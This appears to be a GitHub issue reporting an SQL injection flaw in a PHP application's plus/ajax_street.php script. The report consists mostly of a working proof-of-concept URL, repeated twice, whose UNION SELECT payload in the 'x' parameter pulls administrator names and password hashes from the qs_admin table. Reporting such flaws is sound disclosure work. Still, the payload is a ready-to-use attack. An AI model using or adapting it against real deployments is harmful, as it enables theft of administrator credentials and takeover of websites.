$alphabet=trim($_GET['x']);
and then $alphabet has been pass to sql without filter so leads to sql inject
poc like :
/plus/ajax_street.php?act=alphabet&x=11�' union select 1,2,3,concat(0x3C2F613E20),5,6,7,concat(0x4E56535F544553542D2D,admin_name,0x3A,pwd,0x2D2D4E56535F54455354),9 from qs_admin#
The text was updated successfully, but these errors were encountered:
upload/plus/ajax_street.php

$alphabet=trim($_GET['x']);
and then $alphabet has been pass to sql without filter so leads to sql inject
poc like :
/plus/ajax_street.php?act=alphabet&x=11�' union select 1,2,3,concat(0x3C2F613E20),5,6,7,concat(0x4E56535F544553542D2D,admin_name,0x3A,pwd,0x2D2D4E56535F54455354),9 from qs_admin#The text was updated successfully, but these errors were encountered: